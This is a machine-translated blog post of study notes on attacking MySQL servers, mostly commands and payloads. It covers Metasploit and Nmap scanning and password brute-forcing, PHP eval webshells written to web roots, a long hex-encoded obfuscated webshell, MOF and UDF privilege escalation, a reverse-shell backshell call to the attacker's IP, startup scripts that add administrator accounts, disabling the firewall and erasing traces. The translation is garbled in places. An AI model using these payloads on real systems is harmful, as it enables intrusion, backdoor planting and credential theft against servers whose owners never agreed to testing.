(Today, I turned to my notes of mysql learning a year ago, and felt it was good to share my notes of learning process) Reference: www.ddosi.com/b147/
Mysql penetration and utilization study notes
1. Mysql information collection
1.1 Host Collect host information about port 3306
1.2 Collecting version information
1.3 Collecting Database Management Information
1.4 MSF information collection module
2. Obtain the Mysql password
2.1 Brute Force Cracking
2.2 Source code Leakage
2.3 File Inclusion (Local File Inclusion)
2.4 Other Circumstances
3, Mysql access to webshell (using core :))
3.1 Obtaining webshell using the phpMyadmin root account
A, directly read the backdoor file (has the following situation)
B, query select direct export a word backdoor
C, create a database export a backdoor
D. Executable command mode
E. Use anti-virus software
F. Directly export encrypted Webshell
G. CMS obtains webshell
H, general_log_file obtains the Webshell
I. Obtain webshell from SQLMap injection point
4. Mysql lift rights
4.1 right of mof
4.2 MSF directly raises mOF rights
4.3 UDF rights
1.UDF right raising conditions
2. Weight lifting method
3. Udf rights assignment in Webshell
4.Mysql comprehensive utilization tool for weight lifting
5. Webshell entitlement cannot be obtained
6. Sqlmap directly connects to the database
7. MSF UDF rights lifting
8. Start item lifting
9. Other Msf related vulnerability rights
Mysql password cracking
1. Mysql information collection
1.1 Host Collect host information about port 3306
Nmap port detection: nmap-p3306 192.168.0.1-254Copy the code
1.2 Collecting version information
(1) MSF view the version information: auxiliary/scanner/mysql/mysql_version module.
For example, scan host 192.168.0.100
The use of auxiliary/scanner/mysql/mysql_version set RHOSTS 192.168.0.100 runCopy the code
(2) Mysql query version command
select @@version;
select version();
Copy the code
(3) SQLMap determines information by injection point
sqlmap -u url --dbms mysql
Copy the code
After login, check the version parameter in localhost-> variables -> server variables and Settings. (It is operated and to be verified)
1.3 Collecting Database Management Information
Communicate, communicate, phpadmin, etc.
Some of these tools save configuration information directly, including the database server address and database user name and password, which can be obtained by sniffing or cracking the configuration file
1.4 MSF information collection module
(1)mysql hash value enumeration (1)
The use of auxiliary/scanner/mysql/mysql_hashdump set RHOSTS 192.168.0.100 set the USERNAME root set PASSWORD root runCopy the code
(2) Obtain information about admin
Gets the database version, operating system name, schema, database directory, database user, and password hash.
The use of auxiliary/admin/mysql/mysql_enum set RHOSTS 192.168.0.100 set the USERNAME root set PASSWORD root runCopy the code
(3) execute mysql statement, after successful connection can execute SQL statement in MSF, similar to SQLmap — SQL-shell module
Use auxiliary/admin/mysql/mysql_sql set RHOSTS 192.168.0.100 set the USERNAME root set PASSWORD root set show SQL databases; runCopy the code
(4) Export mysql_schem to the /root/.msf4/loot/ folder
The use of auxiliary/scanner/mysql/mysql_schemadump use auxiliary/admin/mysql/mysql_sql set RHOSTS 192.168.0.100 set the USERNAME root set PASSWORD root runCopy the code
Export mysql_schem to the /root/.msf4/loot/ folder – the table structure of the file
(5) File enumeration and directory writable information enumeration
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_writable_dirs
Copy the code
No tests were successful, enumeration directories and related files need to be defined (more related directory dictionaries are required).
2. Obtain the Mysql password
2.1 Brute Force Cracking
(1) Webpage online connection blasting
You can use
Burpsuite (https://portswigger.net/burp/) and phpMyAdmin multi-threaded batch cracking tool (http://pan.baidu.com/s/1c1LD6co).Copy the code
(2) MSF implements brute force cracking through the command line
MSF auxiliary/scanner/mysql/mysql code module mysql_login for many parameters use auxiliary/scanner/mysql/mysql_loginCopy the code
msf5 auxiliary(scanner/mysql/mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port (TCP) STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attemptsCopy the code
For a single host, only RHOSTS, RPORT, USERNAME, PASSWORD, and PASS_FILE need to be set. Other parameters need to be set based on site requirements
(1) Scenario A: After obtaining A password of root on the Intranet, the system expands and penetrates the Intranet
u
Se auxiliary/scanner/mysql/mysql_login set RHOSTS 192.168.0.1-254 set password root set the username root runCopy the code
After this command is executed, scan the mysql password for 192.168.0.1-254
(2) Scenario B: Scan using the password dictionary
The use of auxiliary/scanner/mysql/mysql_login set RHOSTS 192.168.0.1-254 set pass_file/TMP/password. TXT set the username root runCopy the code
(3) Use NMAP to scan and crack passwords
A. Perform brute force cracking and scanning for default nMAP passwords for an IP address or IP address segment
Nmap --script=mysql-brute 192.168.0.100 --script=mysql-brute 192.168.0.1-254Copy the code
B. Use the root account root password to verify the mysql password and scan for the port information of the specified IP address and information about the mysql database
Nmap -sv --script=mysql-databases --script-args mysqluser=root,mysqlpass=root 192.168.0.100Copy the code
C. Check the root empty command
Nmap - script mysql - empty - password 192.168.0.100Copy the code
(4) When using HSCAN tool to scan mysql passwords, IP address segment, database password dictionary and user name dictionary need to be set.
https://github.com/search?q=hscan
Copy the code
2.2 Source code Leakage
(1) Website source code backup files (sensitive files JDBC backup, Java XML configuration files)
Some web site source files contain database connection files that can be viewed to obtain database accounts and passwords. Common database connection files are config.php, web.config, conn.asp, db.php/asp, jdbc.properties, sysconfig.properties, JBOSS_HOME\docs\examples\jca \ XXXX – ds. XML. There used to be a tool to dig chicken can customize website names such as the zip/rar/tar, tar. Gz/gz/SQL suffix files scanned.
(2) Configure the backup file (bak file)
After you edit a database configuration file using ultraEdit or Editplus, a bak file is left
2.3 File Inclusion (Local File Inclusion)
The local file inclusion vulnerability can contain files, which can be accessed by viewing the file code to obtain the database configuration file, and then read the database user name and password.
2.4 Other Circumstances
Some software will write IP address, database user name and password into the program. After running the program, Cain software can sniff and obtain the database password. In addition, some administrators of Mysql client management tool will set up connection records. These connection records save the user name, password and connection IP address or host name. You can obtain the user name and password through configuration files or sniffing.
The client saves the password, as well as some comments inside the password.
3, Mysql access to webshell (using core :))
3.1 Obtaining webshell using the phpMyadmin root account
MysqlRoot access to webshell via phpMyAdmin:
A, directly read the backdoor file (has the following situation)
Through program error, phpInfo function, program configuration table and other direct access to the real path of the site, some sites have been infiltrated, so there are backdoor files in the directory through load_file directly read.
B, query select direct export a word backdoor
If you need to know the actual physical path of the website, for example, /var/www or (E:/ WWW /), you can run the following query to obtain cmd.php
select '<? php @eval($_POST[thelostworld]); ? >'INTO OUTFILE '/var/www/shell.php'Copy the code
C, create a database export a backdoor
In the query window directly execute the following code, similar to the principle of B
CREATE TABLE `mysql`.`thelostworld` (`temp` TEXT NOTNULL ); INSERT INTO `mysql`.`thelostworld` (`temp` ) VALUES('<? php @eval($_POST[thelostworld]); ? > '); SELECT `temp` FROM `thelostworld` INTO OUTFILE'/var/www/shell.php'; DROP TABLE IF EXISTS `thelostworld`;Copy the code
D. Executable command mode
Create a shell that executes commands, but only if the other party does not close system functions. After exporting the method successfully, you can run the DOS command as follows :www.xxx.com/shell.php?c…
select '' INTO OUTFILE '/var/www/shell.php';
Copy the code
In addition, under Linux, you can export the shell that directly executes the command:
SELECT '' INTO OUTFILE '/var/www/shell.php';
Copy the code
http://localhost/shell.php?c=cat%20/etc/passwd
E. Use anti-virus software
Upload publicguide.jpg from the background or somewhere where you can upload the image as follows:
Then export the Webshell by including temp.php in the image.
select ''INTO OUTFILE '/varwww/shell.php';
Copy the code
One word backdoor password: Antian365
F. Directly export encrypted Webshell
The password of the backdoor file is pp64mqa2x1rnw68. Run the following command to export the encrypted webshell: D:/WEB/IPTEST/22.php.
select unhex('203C3F7068700D0A24784E203D2024784E2E737562737472282269796234327374725F72656C6750383034222C352C36293B0D0A246C76636 7203D207374725F73706C697428226D756B3961773238776C746371222C36293B0D0A24784E203D2024784E2E73756273747228226C396364706C616 365704172424539646B222C342C35293B0D0A246A6C203D2073747269706F732822657078776B6C3766363674666B74222C226A6C22293B0D0A24742 03D2024742E737562737472282274514756325957774A63567534222C312C36293B0D0A2465696137203D207472696D28226A386C32776D6C3436726 5656E22293B0D0A2462203D2024622E73756273747228226B6261736536346B424474394C366E6D222C312C36293B0D0A246967203D207472696D282 26233397730676E756C6922293B0D0A2479203D2024792E24784E28227259222C22222C22637259726572596122293B0D0A24797531203D207374725 F73706C697428226269316238376D3861306F3678222C32293B0D0A2474203D2024742E24784E282278413678222C22222C2277784136786F4A46392 2293B0D0A246E64203D2073747269706F7328226E363574383872786E303265646A336630222C226E6422293B0D0A2462203D2024622E24784E28227 7493339222C22222C225F774933396477493339656322293B0D0A2468387073203D207374725F73706C697428226B6E396A3968346D6877676633666 A6970222C33293B0D0A2479203D2024792E7375627374722822687974655F66756E775669535645344A222C322C36293B0D0A24796637203D2073747 26C656E282275656875343967367467356B6F22293B0D0A2474203D2024742E24784E28226670222C22222C22516670546670314E667022293B0D0A2 46D39203D207374726C656E282265756C363034636F626B22293B0D0A2462203D2024622E73756273747228226C3057316F64656C413165536E454A2 22C342C33293B0D0A2468306277203D207472696D28226E33653568306371746F6B76676F6238747822293B0D0A2479203D2024792E24784E2822796 2222C22222C2263796274696F22293B0D0A24733761203D20727472696D2822617565627963396734743564386B22293B0D0A2474203D2024742E737 5627374722822624D73306E4268383355577964222C392C34293B0D0A2464353971203D2073747269706F732822636A7675636B6F79357766336F746 561222C226435397122293B0D0A2479203D2024792E73756273747228226E4439487851534C386E6752222C392C31293B0D0A246C31203D207374725 F73706C697428226167717130396762716E31222C34293B0D0A2474203D2024742E24784E282277366F34222C22222C2277634477366F345977366F3 43022293B0D0A247079203D2073747269706F7328226C677938687472727631746333222C22707922293B0D0A2474203D2024742E24784E282265503 332222C22222C22625846655033326822293B0D0A2478703364203D2073747269706F732822756B6C306E626E7839677433222C227870336422293B0 D0A2474203D2024742E7375627374722822696B4A3030484A4D6E677863222C372C35293B0D0A2464743262203D207374726C656E282265346135616 275616A7733766C6369726122293B0D0A2474203D2024742E737562737472282263644E314B78656D35334E776D456838364253222C372C34293B0D0 A2475626A203D207374726C656E28227767686A6E6674326F70356B7831633038367422293B0D0A2474203D2024742E73756273747228226D34616F7 864756A676E58536B63784C344657635964222C372C36293B0D0A247178203D207374726C656E2822726C71666B6B6674726F3867666B6F377961222 93B0D0A2474203D2024742E7375627374722822723779222C312C31293B0D0A246D75203D20727472696D28226E676478777578357671653122293B0 D0A246A203D2024792822222C20246228247429293B0D0A24626E6C70203D207374726C656E28227675667930616B316679617622293B0D0A2473646 8203D207374725F73706C69742822776D6E6A766733633770306D222C34293B0D0A246D62203D206C7472696D28226E353270317067616570656F6B6 622293B0D0A2465307077203D20727472696D28227575346D686770356339706E613465677122293B0D0A24756768203D207472696D2822726370643 36F3977393974696F3922293B0D0A246772636B203D207374726C656E2822783572697835627031786B793722293B0D0A24656F3674203D207374726 C656E282264646931683134656375797563376422293B246A28293B0D0A2464766E71203D207374725F73706C6974282270726D36676968613176726 F333630346175222C38293B0D0A24756738203D20727472696D28226563387735327375706234767538656F22293B0D0A24726374203D20737472697 06F73282268786536776F37657764386D65376474222C2272637422293B0D0A24656B7166203D207374725F73706C697428227072663579303865386 66C6666773032356A38222C38293B0D0A24767972203D207374725F73706C69742822756D706A63737266673668356E64366F3435222C39293B0D0A2 4777266203D20727472696D282266797839396F3739333868377567716822293B0D0A24713134203D207374726C656E2822746334366F73786C31737 43169633222293B0D0A66756E6374696F6E206F2820297B2020207D3B0D0A24757366203D207374726C656E2822666C7463707862377466626A736D7 422293B0D0A3F3E') into dumpfile 'D:/WEB/IPTEST/22.php'Copy the code
Note:
You can also use tool.lu/hexstr/ site’s generation…
Select unhex(' hexadecimal string ') into dumpfile 'D:/WEB/shell.php'Copy the code
G. CMS obtains webshell
In some cases, the real path of the website cannot be obtained, which means that the webshell cannot be exported directly. You can log in to the system through the CMS system management account and find loopholes to break through. For example, Dedecms can obtain webshell by cracking the administrator account and uploading files directly. Discuz! UC_key of the webshell can be retrieved directly. Some systems can even upload PHP files directly. Here are some tips for CMS penetration:
(1) The password of the dedecms system can be directly MD5 or 20-digit password. If the password is 20-digit, the first 3 and last 1 bits in the password need to be removed, and then the remaining values can be decrypted by MD5.
(2) Add salt to the PHPCMS V9 password to crack the password. Select md5(md5(pass).pass).pass).
(3) Discuz! Forum accounts are stored in the ucenter_members (discuz7.x or above) or cdb_members (discuz6.x or above) table with a password:salt. For example a0513df9929afc972f024fa4e586e829:399793.
H, general_log_file obtains the Webshell
(1) Check the genera file configuration
show global variables like "%genera%";
Copy the code
Disable general_log
set global general_log=off;
Copy the code
(3) Use the general_log option to get webshell
set global general_log='on'; SET global general_log_file='/var/www/cmd.php';Copy the code
Execute statement in query:
SELECT '';
Copy the code
The Shell is cmd.php, and the password is CMD.
I. Obtain webshell from SQLMap injection point
The sqlMap injection point must have the write permission to obtain the Webshell, which is usually the root account, by running commands
sqlmap -u url--os-shell echo "" >/data/www/shell.php
Copy the code
4. Mysql lift rights
4.1 right of mof
(1) Webshell uploads MOF files and raises rights
MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploits (www.exploit-db.com/exploits/23… Windows Remote System Level Exploit (Stuxnet technique) 0day). The Windows Management Specification (WMI) provides the following three methods for compiling managed Object Format (MOF) files into the WMI repository:
Method 1: Run the MOF file specified as the command line parameter mofcomp.exe file. Method 2: Use the IMofCompiler interface and the $CompileFile method. Method 3: Drag and drop the MOF file in the %SystemRoot%\System32\Wbem\MOF folder
Microsoft recommends that you compile MOF files into the repository using the first two methods. Is run Mofcomp. Exe files, or use IMofCompiler: : CompileFile method. The third method is only available for backward compatibility with earlier versions of WMI, and should not be used because this feature may not be available after future versions. Note that the MOF method can be used only if the current Root account can copy files to the %SystemRoot%\ system32\ Wbem\MOF directory, otherwise it will fail.
The prerequisite for the use of this vulnerability is to have the root permission of mysql, in Kingcope published 0day published a PL use script.
Perl mysql_win_remote.pl 192.168.2.100 root “” 192.168.2.150 5555
192.168.2.100 is the server where the mysql database resides. The mysql password is empty and is displayed on port 5555 at 192.168.2.150.
Generate the nullevt. Mof file
Save the following code as a nullevt.mof file
#pragma namespace("\\.\root\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select \ From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
Copy the code
(3) Import files through Mysql query
Import the nullevt.mof generated above into c:\ Windows \ System32 \wbem\mof\, which is denied access by default in Windows 7. After the import, the system automatically runs the command.
selectload_file('C:\RECYCLER\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
Copy the code
4.2 MSF directly raises mOF rights
Msf’s exploits/Windows/mysql/mysql_mof module provides direct the Mof rights, but the vulnerability success associated with operating system permissions and mysql database version, after the success of the execution will rebound to meterpreter shell directly.
Use exploits/Windows/mysql/mysql_mof set rhost 192.168.0.100 / / set the need of the right to the remote host IP address set rport / 3306 / set of mysql remote port set password Root // set the root password of the mysql database set username root // set the username of the mysql database options // view the Settings run 0Copy the code
Skills:
If you are able to use web connection management (phpMyadmin), you can change the host to % and refresh the permissions, then you can use tools such as MSF to connect to the database remotely. By default, accounts such as root cannot be remotely connected unless configured by the administrator or database user.
Mysql > select * from user where host = %; mysql > select * from user where host = %
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES ;
select host, user from user;
Copy the code
Approach 2: Direct Authorization (recommended)
Connect to the mysql server as user root from any host with the password youPassword (your root password) :
# mysql -u root -proot
GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;
FLUSH PRIVILEGES;
Copy the code
You are advised to add another user. During the actual test, it was found that many servers use root to configure multiple IP addresses. Changing the IP addresses may affect actual system running. During actual testing, it is recommended that you create a new user and grant all permissions instead of directly changing the root configuration.
4.3 UDF rights
UDF is to make use of MYSQL’s custom function function to convert MYSQL account into system permission. The condition of UDF is that the target system is Windows(Win2000,XP,Win2003). Has a MYSQL user account that has insert and delete permissions to create and discard functions and has a root password
UDF rights allocation in Windows is applicable to servers with Windows2008 or less, that is, the success rate of UDF rights allocation in Windows2000 or Windows2003 is high.
1.UDF right raising conditions
(1) the udf. DLL file must be stored in the lib\plugin folder of the Mysql installation directory. (2) The Mysql version is earlier than 5.1. Udf.dll files are stored in C :\ Windows \ System32 in Windows2003 and C :\winnt\system32 in Windows 2000. (3) The account of the mysql database has insert and delete permissions for mysql to create and discard functions. Generally, the root account is preferred, and other accounts that have the permissions of ‘root account’ can also be used. (4) The permission to write UDF.DLL to the corresponding directory.
2. Weight lifting method
(1) Obtain database version, data location, plug-in location and other information
select version(); Select user(); Select @@basedir; // Show variables like '%plugins%'; // Find the mysql installation pathCopy the code
Operation screenshot:
(2) Export path
C:\Windows\udf.dll Windows 2000 C:\Windows\ udF.dll Windows2003Copy the code
For MYSQL 5.1 or later, you must place udf. DLL in the libplugin folder of the MYSQL installation directory to create custom functions. This directory does not exist by default, so you need to use webshell to find the MYSQL installation directory, create the libplugin folder in the installation directory, and export the udf. DLL file to this directory.
In some cases, we Can’t open the shared library. In this case, we need to export udF.dll to the lib\plugin directory.
select @@basedir; Select 'It is DLL 'into dumpfile 'C:\Program Files\ mysql \ mysql Server 5.1\lib::$INDEX_ALLOCATION'; Select 'It is DLL 'into dumpfile 'C: Program Files\MySQL\MySQL Server 5.1 \ lib \ plugins: : $INDEX_ALLOCATION '; // Create plugin directory with NTFS ADSCopy the code
After successful execution, the plugin directory will be used, and then export udF.dll.
(3) Create cmdshell function, what is the name of this function and use this function to query in the future
Create function cmdshell returns string soname 'lib_mysqludf_sys. DLL';Copy the code
(4) Execute commands:
The select sys_eval (' whoami ');Copy the code
In general, there will not be unsuccessful creation oh.
If you cannot connect to 3389, stop Windows Firewall and filter first
The select sys_eval (" net stop policyagent '); The select sys_eval (" net stop sharedaccess ');Copy the code
Common functions in udF.dll:
Cmdshell execution CMD; For downloader, download the specified file from the Internet and save it to the specified directory. Open3389 universal open3389 terminal service, you can specify the port (do not change the port need not restart); Backshell rebound Shell; ProcessView enumerates system processes; KillProcess Terminates the specified process. Regread reads the registry; Regwrite Write registry; Shut down, shut down, restart. About description and help function;
Specific user examples:
select cmdshell('net user iis_user 123! @#abcABC /add'); select cmdshell('net localgroup administrators iis_user /add'); select cmdshell('regedit /s d:web3389.reg'); select cmdshell('netstat -an');Copy the code
(5) Remove traces
drop function cmdshell; // Delete the functionCopy the code
Delete udf. DLL files and other intrusion files and logs.
(6) Common errors
1290 -- The MySQL server is running with The -- secure-file-priv option so it cannot execute this statement Log out (using # signs) the row containing secure_file_priv in my.ini or mysql.cnf (SHOW VARIABLES LIKE "secure_file_priv"). 1123 -- Can't initialize function 'backshell'; UDFs are unavailable with the -- skip-grant-tables option You need to remove the skip-grant-tables option in my.ini.Copy the code
3. Udf rights assignment in Webshell
Enter the database user name and password and the database server address or IP address through webshell that integrates UDF right allocation. Export the database user name and password through connection for right allocation.
4.Mysql comprehensive utilization tool for weight lifting
V5est0r wrote a comprehensive utilization of Mysql to mention right tool (https://github.com/thelostworldFree/Python_FuckMySQL) (1) automatic export your backdoor and mof file (2) automatic judgment Mysql version, Export UDF DLLS to different directories according to different versions. UDF allocation (3) Export LPK. DLL files and hijack system directory allocation (4) Write startup item allocation UDF automatic allocation: Python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf LPK Python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m LPK Py -a 127.0.0.1 -p root -e "ver&whoami" -mst for example, run LOAD_FILE to check Mysql configuration file my.ini. This cannot be exercisedCopy the code
5. Webshell entitlement cannot be obtained
1. Connect the mysql
Mysql. exe -h IP -uroot -p (2) phpMyadmin (3) Navicat for mysql
2. View the database version and data path
SELECT VERSION(); Select @@datadir; 5.1 Import the DLL to C :/ Windows or C :/ Windows/System32/5.1 And later versions run the following command to query the plug-in path: SHOW VARIABLES WHERE Variable_Name LIKE "%dir"; show variables like '%plugin%' ; select load_file('C:/phpStudy/Apache/conf/httpd.conf') select load_file('C:/phpStudy/Apache/conf/vhosts.conf') select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf') select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf') select load_file('d:/phpStudy/Apache/conf/vhosts.conf')Copy the code
3. Modify mysql. TXT
Mysql.txt is converted into hexadecimal code for udF.dll binary files.
(1) Perform the first import ghost table content
Modify the following code: select backshell(” YourIP “,4444);
(2) Export files to a directory
select data from Ghost into dumpfile 'c:/windows/mysqldll.dll'; select data from Ghost into dumpfile 'c:/windows/system32/mysqldll'; select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll'; Select data from Ghost into dumpfile 'E: / PHPnow - 1.5.6 / MySQL - 5.0.90 / lib/plugins/mysqldll'; Select data from Ghost into dumpfile 'C: / websoft/MySQL/MySQL Server 5.5 / lib/plugins/mysqldll DLL' select data from a Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll'; Select the load_file (' C: / ProgramData/MySQL/MySQL Server 5.1 / Data/MySQL/user FRM '); Select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/ mysqldl.dll 'Copy the code
(3) Check whether cmdshell and backshell exist in FUNCTION
Drop FUNCTION cmdshell; Cmdshell drop FUNCTION backshell; Backshell: CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldl.dll '; Nc-vv-l -p 44444 Run the following command to query backshell: select backshell("192.192.192.1",44444); // Change 192.192.192.1 to your IP address and port number. 4. Add user commands after obtaining webshell. In this case, go to C :\ Windows \ System32 \ and run net user Antian365 www.xianzhi.aliyun.com /add NET LocalGroup Administrators Antian365 Sqlmap directly connects to the database to initiate privileges. Write permission, root account and password are required. Run the following command: Py -d "mysql://root:[email protected]:3306/mysql" -- OS-shell (2) Select the OS architecture. Select 1 for 32-bit OS. 64-bit selection 2. (3) Automatically upload udF or the OS-shell message is displayed. (4) Run the whomai command.Copy the code
7. MSF UDF rights lifting
Kali penetration testing platform to perform (Kali download https://www.kali.org/downloads/) msfconsole use exploits/Windows/mysql/mysql_payload options set Rhost 192.168.2.1 set rport 3306 set username root set password 123456 run 0 Or exploit MSF UDF rights promotion success rate is not high. Permissions depend on the database version, especially the secure-file-priv option, which is unlikely to succeed.Copy the code
8. Start item lifting
1. Create a table and insert the VBS script into the table
Use the following commands in sequence: show databases; use test; show tables; create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ; insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " ); select \ from a;Copy the code
2. Export the VBS script to the startup
Use the following command to export the VBS script you just created in table A to the startup options. Select \ from a into outfile "C:\Documents and Settings\All Users\ "Start" menu \ program \ start \a. bs"; After the import is successful, the system automatically adds the user whose password is 1 and user name is 1 to the administrator group upon the restart. In actual use, the probability of the script being successfully executed is low. Sometimes, an error may occur that the script cannot be exported. The following script is recommended: show databases; use test; show tables; create table b (cmd text); insert into b values ("net user Aspnet123545345! /add"); insert into b values ("net localgroup administrators Aspnet /add"); insert into b values ("del b.bat"); Select from b into outfile "C: Documents and Settings\All Users\ "Start" menu \ program \ start \b.bat"; This script will appear in the Dos window after execution, but if you have permission to import it into startup options, it will be executed successfully. After connecting to the VIRTUAL machine through MySQL connector and executing the above command, In the C: Documents and Settings\All Users\ "Start" menu \ Programs \ start directory you will find the b. Bat script file that you just exported, which explains how C: Documents and Settings\All is used in different operating systems Users\ "Start" menu \ program \ start directory file names may be different, in this case, it is necessary to replace the directory with the corresponding directory name. For example, if the operating system is an English version, the code inserted is: select from b into outfile "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\b.bat"; The Windows Server 2008 Startup directory is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\iis. VBS The VBS process is as follows: create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"" ) " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234! @# /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " ); select \ from a into outfile "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\iis.vbs";Copy the code
3. The module under the MSF exploits/Windows/mysql/mysql_start_up rights
Use exploits/Windows/mysql/mysql_start_up set rhost 192.168.2.1 set rport 3306 set the username root set password 123456 run Mysql_start_up under MSF has a certain probability of lifting weights, which supports English version of the system well.Copy the code
9. Other Msf related vulnerability rights
1.Mysql Authentication Vulnerability and Utilization (CVE-2012-2122)
When connecting to MariaDB/MySQL, the entered password will be compared with the expected correct password. Due to incorrect processing, even if memcmp() returns a non-zero value, MySQL will think that the two passwords are the same. That is to say, as long as you know the user name, keep trying to log directly into the SQL database. According to the announcement about 256 times can be correct. Affected products: All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 Have vulnerabilities.
MariaDB Versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 No vulnerabilities exist.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not compromised.
1.use auxiliary/scanner/mysql/mysql_authbypass_hashdump
2.exploit/windows/mysql/mysql_yassl_hello
3.exploit/windows/mysql/scrutinizer_upload_exec
Mysql password cracking
A. Cain tool decrypts mysql password
Use UltraEdIT-32 editor to directly open the user.MYD file and view it in binary mode after opening it. There is a string of strings behind the root user. Select these strings and copy them to Notepad. For example, 506 d1427f6f61696b4501445c90624897266dae3.
Note:
(1) Do not copy “” after root into the string.
(2) In some cases you need to look back, otherwise you won’t get the full MYSQLSHA1 password, which is 40 digits.
Install Cain tool, use cracker, right click “Add tolist” to Add Mysql Hashes value to crack list, use dictionary, brute force crack, etc.
B. Online password cracking
1. HTTP: / / cmd5.com. Query the obtained mysql value in the cmd5.com website. Mysql passwords are generally charged.
2. HTTP: / / somd5.com. Somd5.com is the back of a free crack site, each crack requires manual selection of graphic code to crack, fast, good effect, but only one crack at a time, and a crack after the need to re-enter the verification code.
C. Oclhash
Hashcat supports a variety of cracking algorithms, free open source software, official website hashcat.net/hashcat/, cracking…
Hashcat64. exe -m 200myql.hashpass.dict // Unlock MySQL323
Exe -m 300myql.hashpass.dict // Unlock MySQL4.1/MySQL5
D、 John the Ripper password cracker
John the Ripper download address: www.openwall.com/john/h/john… The Ripper is capable of cracking passwords in many formats in addition to Linux.
Echo 81 f5e21e35407d884a6cd4a731aebfb6af209e1b > hashes. TXT format = John - mysql - sha1 hashes. TXT John - list = formats | grep Mysql // Check the algorithms that support mysql password crackingCopy the code
For reference (www.ddosi.com/b147/)
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…